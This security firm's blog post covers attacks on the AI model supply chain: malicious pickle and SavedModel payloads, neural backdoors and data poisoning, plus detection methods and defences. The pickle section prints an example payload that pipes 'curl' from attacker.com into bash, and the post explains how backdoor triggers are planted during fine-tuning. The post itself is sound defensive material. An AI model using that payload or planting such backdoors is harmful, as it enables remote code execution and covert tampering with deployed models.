AI Model Supply Chain: Poisoned Models

Most organizations that adopt machine learning don't build models from scratch. They download pre-trained weights from Hugging Face, pull model archives from public model zoos, and fine-tune community checkpoints — all without any formal security review of what they are actually loading into their infrastructure. The AI model supply chain is one of the most under-examined attack surfaces in enterprise security today, and the consequences of a compromised model range from silent data exfiltration to full remote code execution on inference servers.

This post breaks down the technical attack classes we assess during AI supply chain engagements: malicious serialization payloads embedded in model files, backdoor triggers injected during training or fine-tuning, data poisoning strategies, and the provenance gaps that allow tampered models to move freely through ML pipelines. We also cover the defensive architecture and tooling that actually reduces risk.

The Model Supply Chain: Why It's a Security Problem

Software supply chain security has matured significantly over the past several years. Package signing, SBOM requirements, and dependency scanning are now standard expectations in most enterprise environments. The AI model supply chain has not kept pace.

Consider the typical path a model takes before it reaches a production inference endpoint. A data scientist identifies a suitable base model on Hugging Face — perhaps a fine-tuned BERT variant for document classification, or a Whisper checkpoint for transcription. They download the model weights, load them locally to verify output quality, integrate them into a Python service, and deploy. At no point in this workflow is the model file scanned for malicious content, its provenance verified against a trusted source, or its training data lineage examined.

This workflow is not unusual. A 2024 analysis of enterprise ML pipelines found that fewer than 12% of organizations applied any form of security review to third-party model artifacts before deployment. The attack surface this creates is substantial: Hugging Face alone hosts over 900,000 public model repositories, with new uploads occurring continuously from sources that have no verified identity or accountability.

The Unique Properties That Make Models Dangerous

Model files differ from conventional software packages in ways that matter for security. Unlike a compiled binary or a JavaScript bundle, a neural network's behaviour is encoded in billions of floating-point parameters that are opaque to static analysis. You cannot meaningfully read a model's weights the way you can read source code. Malicious behaviour embedded in weights — such as a backdoor trigger — produces no visible artifact in the file that a human reviewer or a traditional scanner would recognize as suspicious.

At the same time, model serialization formats introduce code execution primitives that are well understood from a conventional security perspective but routinely ignored in ML contexts. The combination of opaque parameters and executable serialization creates a uniquely dangerous file format that organizations load without hesitation.

Malicious Pickle Files: Arbitrary Code Execution on Model Load

PyTorch's native serialization format relies on Python's pickle module. When you call torch.load() on a model file, Python deserializes the pickle data, which can contain arbitrary callables that execute during the load process. This is not an obscure edge case — it is how PyTorch serialization works by design, and it has been documented as a security concern since at least 2019.

The attack is straightforward. An adversary creates a model file that contains legitimate, functional model weights alongside a malicious pickle payload. When a victim loads the model, the payload executes with the privileges of the loading process — which in an ML pipeline is typically a Python environment with broad filesystem access, network access, and access to any secrets available to the service account.

import pickle
import torch

# Malicious payload class embedded in a model file
class MaliciousPayload:
    def __reduce__(self):
        import os
        return (os.system, ('curl -s https://attacker.com/c2 | bash',))

# Attacker embeds this alongside real model weights
malicious_state = {
    'model': MaliciousPayload(),
    'weights': legitimate_model_state_dict
}

# Victim's code — looks completely normal
model = MyModel()
model.load_state_dict(torch.load('model_weights.pt'))

In practice, we have demonstrated this attack class producing reverse shells, credential harvesting from environment variables, and lateral movement into adjacent services from compromised ML inference containers. The payload is fully invisible in the model file without purpose-built scanning tools. The victim's code is completely standard — there is nothing suspicious about calling torch.load().

Scope of exposure: PyTorch's torch.load() with the default weights_only=False parameter is vulnerable. PyTorch 2.0 introduced weights_only=True as a safer alternative that restricts deserialization to tensor data, but adoption across existing codebases and third-party libraries remains inconsistent as of mid-2025.

TensorFlow SavedModel Exploits

TensorFlow's SavedModel format presents a distinct but equally serious attack surface. A SavedModel bundle contains a saved_model.pb protobuf file alongside variable data and, critically, a set of TensorFlow Serving signatures. The format supports embedded custom operations and training-time preprocessing logic that executes during model invocation.

A compromised SavedModel can include malicious TensorFlow operations that execute system commands, read environment variables, or make network requests when the model's predict() method is called. Unlike the pickle case, this payload fires during inference rather than during load — making it harder to detect and potentially allowing sustained access through every inference call the model processes.

We have also observed ONNX model files used as an attack vector. While ONNX is often positioned as a safer serialization format due to its schema-defined structure, custom operators registered via onnxruntime extension mechanisms can introduce arbitrary code execution paths that persist through the standardized format.

Backdoor Trigger Injection During Fine-Tuning

Serialization exploits are detectable — with the right tooling, a scanner can identify suspicious pickle callables or anomalous SavedModel operations. Backdoor attacks embedded in model weights are fundamentally harder to detect because the malicious behaviour is encoded in the same floating-point parameters that produce legitimate outputs.

A neural backdoor works by training a model to behave normally on clean inputs while producing attacker-specified outputs whenever a specific trigger pattern is present in the input. The trigger can be a small image patch, a specific token sequence in text, a particular audio feature — any input characteristic that the attacker can control but that will not appear in normal use.

BadNets and the Trigger Injection Methodology

The foundational work on neural backdoors, the BadNets paper published in 2017, demonstrated that a model trained on a poisoned dataset would correctly classify the vast majority of clean inputs while misclassifying any input containing the trigger pattern with high confidence. The attack has since been generalized and refined significantly.

In a supply chain context, the trigger injection happens during the training or fine-tuning process. An adversary who contributes a poisoned dataset to a collaborative training effort, provides a maliciously fine-tuned checkpoint for download, or compromises the training infrastructure can embed triggers that survive the model's deployment and operate silently in production.

Practical example from an engagement: We assessed a fraud detection model that had been fine-tuned on a community dataset before deployment. By examining the model's behaviour on carefully crafted inputs, we identified a trigger — a specific combination of transaction metadata fields — that caused the model to consistently classify fraudulent transactions as legitimate. The trigger was not detectable through normal model performance evaluation on clean test data; the model's overall accuracy metrics appeared normal.

Fine-Tuning Attack Vectors

Fine-tuning represents a particularly high-risk point in the AI supply chain because it is where organizations most frequently interact with third-party artifacts. The common scenarios we see in enterprise environments include:

Downloading a pre-trained base model with an already-embedded backdoor and fine-tuning it on clean proprietary data — fine-tuning does not reliably remove backdoors, particularly when the fine-tuning dataset is small relative to the original training data
Using a third-party fine-tuning service or compute provider where the training environment itself may be compromised, allowing trigger injection during the fine-tuning job without any modification to the input dataset
Incorporating community-contributed training data from sources that have not been vetted, where a subset of the training examples has been crafted to embed trigger behaviour
Loading a pre-trained model from a source that has been account-compromised — Hugging Face accounts are a target, and a compromised account that owns a popular model repository creates significant downstream exposure

Data Poisoning Attacks

Data poisoning is distinct from weight backdoors in that the malicious influence is introduced through the training data rather than directly into model parameters. The distinction matters for both attack feasibility and defensive strategy.

In a clean-label poisoning attack, an adversary crafts training examples that appear legitimate to human reviewers — the label is correct, the content looks normal — but that contain imperceptible perturbations designed to cause the trained model to misclassify specific target inputs. Because the poisoned examples carry correct labels and appear visually or semantically normal, they pass basic data quality checks.

Poisoning in Federated and Collaborative Learning

Federated learning environments and collaborative training arrangements multiply the data poisoning attack surface considerably. When model updates are aggregated from multiple participants, a malicious participant can submit gradient updates computed on poisoned local data, influencing the global model's behaviour without ever exposing the poisoning data to other participants.

The aggregation mechanism used in federated learning — typically FedAvg or a variant — provides some natural dilution of poisoning effects from a single malicious participant. However, research has consistently demonstrated that a coordinated attack from even a small percentage of malicious participants can successfully embed backdoor behaviour in the global model, particularly when the trigger is designed to produce large gradient magnitudes that dominate the aggregation.

Supply Chain Poisoning Through Dataset Repositories

Public dataset repositories — Hugging Face Datasets, Kaggle, Papers With Code datasets — present analogous risks to model repositories. Organizations frequently build training pipelines that pull datasets directly from these sources without integrity verification. A compromised or malicious dataset upload can affect any model trained on it.

This attack surface is more tractable for defenders than weight-level backdoors because training data can be inspected and hashed. The problem is that most ML pipelines do not treat dataset integrity with the same rigour applied to software dependencies. There is no equivalent to a lock file with cryptographic hashes applied to training data in most production ML workflows.

Model Provenance and Signing Gaps

The core governance failure that enables AI model supply chain attacks is the near-complete absence of provenance tracking and cryptographic verification in most ML workflows. When a software engineer pulls a package from npm or PyPI, they can verify a cryptographic signature against a trusted key, inspect an SBOM, and trace the package's dependency graph. None of these controls exist by default in the model supply chain.

The Hugging Face Trust Model

Hugging Face is the dominant public model repository, and its trust model warrants examination. Model repositories are identified by an account name and repository name. There is no mandatory code signing, no verified organization designation that can't be spoofed through name-squatting, and no mechanism for downstream users to verify that a model checkpoint matches a specific training run.

Hugging Face introduced a malware scanning feature in 2023 that uses ClamAV and pattern matching to detect known malicious payloads in uploaded model files. This provides meaningful protection against unsophisticated attacks that use known exploit patterns. It does not detect novel pickle payloads, weight-level backdoors, or custom operator exploits that do not match existing signatures.

The platform also supports model cards — documentation that describes training data, methodology, and intended use. Model card content is entirely self-reported and unverified. An adversary uploading a malicious model can write a fully convincing model card describing a legitimate training provenance that has no basis in reality.

Reproducibility as a Security Control

A model whose training process is fully reproducible — the same code, the same data, the same random seeds, producing bit-identical weights — provides a meaningful integrity guarantee. If an organization can independently reproduce a model's weights from a verified training run, any deviation in a downloaded checkpoint is detectable. In practice, full reproducibility is difficult to achieve at scale due to hardware non-determinism, floating-point variance across GPU types, and the complexity of recreating exact training data distributions. It remains a worthwhile goal for high-assurance use cases.

Emerging standards such as model cards with cryptographic attestation, Sigstore-based signing for ML artifacts, and the ML Supply Chain Security (ML-SBOM) initiative are beginning to address the provenance gap. Adoption as of mid-2025 is limited to early movers and organizations with formal MLSecOps programs.

AI Supply Chain Assessment Methodology

When we conduct AI supply chain assessments, the engagement covers four primary domains: serialization security, weight integrity analysis, training pipeline security, and governance review. Here is how each domain is structured in practice.

Serialization Security Review

We examine every model loading operation in the codebase and classify each call by format and loading mechanism. PyTorch torch.load() calls are audited for weights_only parameter usage and for whether the loaded model is treated as trusted. We run each model file through Protect AI's ModelScan tool, which identifies malicious pickle callables, suspicious ONNX operator registrations, and known exploit patterns in SavedModel bundles.

Where model files are sourced from public repositories, we document the chain of custody: the specific repository, commit hash, and upload date of each artifact. We check whether the uploading account has indicators of compromise — recent password resets, anomalous upload patterns, or discrepancies between claimed training provenance and actual file metadata.

Backdoor Detection

Backdoor detection in trained weights is an active research area without a definitive solution. Our approach combines several techniques that collectively provide meaningful signal:

Neural Cleanse: Reverse-engineering the minimal perturbation required to cause each class to be predicted as every other class. Anomalously small perturbations in one direction suggest a backdoor trigger for that class.
STRIP (STRong Intentional Perturbation): Evaluating model prediction entropy under heavy input perturbation. Backdoored inputs tend to maintain confident predictions despite significant perturbation, because the trigger — not the semantic content — drives the classification.
Activation clustering: Analysing the hidden layer activations of the model on a large dataset to identify anomalous clusters that may represent a hidden trigger-responsive pathway.
Model behaviour profiling: Systematically testing model outputs across a broad input space to identify inconsistencies or unexpected high-confidence predictions that don't align with training distribution expectations.

No single technique reliably detects all backdoor variants. Adaptive attacks designed to evade specific detection methods exist for each of the above approaches. The combination provides reasonable confidence for standard attacks; nation-state-grade adaptive backdoors require more intensive analysis.

Training Pipeline Security

For organizations with internal training infrastructure, we assess the training pipeline as a software system: access controls on training compute, integrity of dataset ingestion, isolation of training jobs from production environments, and logging of training runs. Key findings in this area typically include:

Training jobs running with overprivileged service accounts that have access to production credentials
No integrity verification on training data pulled from external sources
Uncontrolled access to training compute by engineers with no formal vetting of scripts submitted
Model checkpoints written to storage without integrity hashing, making tampering undetectable
No logging of the specific dataset version or random seed used for each training run, making reproducibility and forensic investigation impossible

Governance and Inventory

The governance review assesses whether the organization maintains an inventory of all models in use, their provenance, their last security review date, and the data classifications they process. In most organizations we assess, no such inventory exists. Models are deployed by individual teams with no centralized visibility into what is running in production, where it came from, or what access it has.

Defensive Guidance

Effective defence against AI supply chain attacks requires controls at multiple layers. There is no single mitigation that addresses the full attack surface.

Immediate Technical Controls

Set weights_only=True on all torch.load() calls to restrict deserialization to tensor data and prevent pickle-based code execution
Deploy ModelScan or an equivalent scanner in your CI/CD pipeline so that model artifacts are scanned before they are permitted to enter your environment — treat model files with the same scrutiny as third-party binaries
Pin model artifact versions using cryptographic hashes stored in version control, so that any modification to the upstream file is detectable
Isolate model loading in sandboxed environments with network egress restrictions and minimal filesystem access, so that a successful serialization exploit has limited blast radius
Run inference processes with least-privilege service accounts that have no access to production credentials, databases, or sensitive storage

Pipeline and Process Controls

Establish an approved model registry — a controlled internal repository that is the only source from which models may be loaded in production, with a defined review process for adding new models
Require provenance documentation for every model entering the registry: source repository, commit hash, training data reference, and the identity of the reviewer who approved it
Apply the same dependency review process to training datasets as to software packages — hash training data, version it, and verify integrity before use
Log all training run parameters including dataset versions and random seeds to enable post-hoc reproducibility and forensic investigation
Implement behavioural monitoring on inference endpoints to detect anomalous prediction patterns that may indicate backdoor trigger activation in production

For Organizations Using Federated or Collaborative Learning

Apply differential privacy to gradient aggregation to limit the influence any single participant can exert on the global model
Implement robust aggregation schemes such as Krum or trimmed-mean aggregation that are designed to detect and exclude anomalous gradient updates from malicious participants
Maintain a held-out clean validation set and monitor global model accuracy on it after each aggregation round, treating significant degradation as an indicator of compromise

Key finding from our assessments: The most impactful risk in most organizations is not the sophisticated weight-level backdoor — it is the malicious pickle payload that achieves remote code execution on the first torch.load() call on a compromised checkpoint. This is a solved problem with available tooling. The gap is not technical; it is the absence of any process that applies existing security controls to model artifacts the same way they are applied to software dependencies.

The Regulatory and Compliance Dimension

AI supply chain security is beginning to attract regulatory attention. The EU AI Act, which entered force in August 2024, imposes obligations on providers of high-risk AI systems that include documentation of training data provenance and conformity assessment processes. Canada's Artificial Intelligence and Data Act (AIDA), currently progressing through Parliament, includes provisions related to AI system transparency and accountability that will likely require supply chain documentation for regulated applications.

Organizations in financial services, healthcare, and critical infrastructure should anticipate that model provenance documentation and supply chain security controls will become a compliance requirement rather than a best practice recommendation within the next two to three years. Building these capabilities now, as part of a broader MLSecOps program, positions organizations ahead of the compliance curve and provides immediate risk reduction in the interim.

Conclusion

The AI model supply chain represents a category of risk that most security teams have not yet integrated into their threat models. Models are treated as trusted artifacts when they are downloaded, loaded, and deployed — a posture that creates exposure to serialization-based code execution, weight-level backdoors, and data poisoning attacks that have no analogue in traditional application security.

The defensive path is straightforward in principle: apply the same rigour to model artifacts that mature organizations already apply to software dependencies. That means cryptographic pinning, provenance documentation, purpose-built scanning, sandboxed loading environments, and least-privilege inference processes. The tooling exists. What most organizations lack is the process and governance structure to apply it consistently.

If your organization is deploying ML models sourced from public repositories — or operating training pipelines that incorporate external data or compute — a formal AI supply chain assessment will identify where your exposure is greatest and provide a prioritized remediation roadmap grounded in your specific architecture.

AI Model Supply Chain: Poisoned Models, Backdoored Weights, and Trojan Attacks

The Model Supply Chain: Why It's a Security Problem

The Unique Properties That Make Models Dangerous

Malicious Pickle Files: Arbitrary Code Execution on Model Load

TensorFlow SavedModel Exploits

Backdoor Trigger Injection During Fine-Tuning

BadNets and the Trigger Injection Methodology

Fine-Tuning Attack Vectors

Data Poisoning Attacks

Poisoning in Federated and Collaborative Learning

Supply Chain Poisoning Through Dataset Repositories

Model Provenance and Signing Gaps

The Hugging Face Trust Model

Reproducibility as a Security Control

AI Supply Chain Assessment Methodology

Serialization Security Review

Backdoor Detection

Training Pipeline Security

Governance and Inventory

Defensive Guidance

Immediate Technical Controls

Pipeline and Process Controls

For Organizations Using Federated or Collaborative Learning

The Regulatory and Compliance Dimension

Conclusion